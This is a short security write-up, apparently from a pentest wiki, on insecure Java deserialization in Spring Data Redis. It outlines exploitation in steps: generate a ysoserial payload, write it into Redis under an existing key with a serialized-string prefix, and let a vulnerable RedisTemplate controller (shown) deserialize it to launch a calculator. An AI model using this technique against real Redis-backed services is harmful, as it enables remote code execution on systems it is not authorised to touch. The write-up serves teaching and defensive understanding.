Spring Data Redis Insecure Deserialization
Spring Data Redis overview
Spring Data Redis, part of the larger Spring Data family, provides easy configuration and access to Redis from Spring applications. Spring Data Redis first serializes data before writing data to Redis. By default, Java native serialization is used for serialization.
Insecure deserialization
When Spring Data Redis retrieves data from Redis, the stored bytecode is deserialized. Since the target class is not checked or filtered during deserialization it can lead to remote code execution.
Example of exploitation:
Generate payload with ysoserial
Write the generated payload in Redis:
// Try to choose a key that already exists in Redis so that code execution can start when Spring retrieves data redis.set("\xac\xed\x00\x05t\x00\brebeyond", payload);
Trigger or wait for Spring to retrieve data, example of vulnerable code:
@Controller public class HelloController { protected RedisTemplate<Serializable, Serializable> redisTemplate; @GetMapping("/") public String index() { Object result = redisTemplate.opsForValue().get("rebeyond"); return "index"; } }
Server starts calculator successfully:
The call stack is as follows:
References
Last updated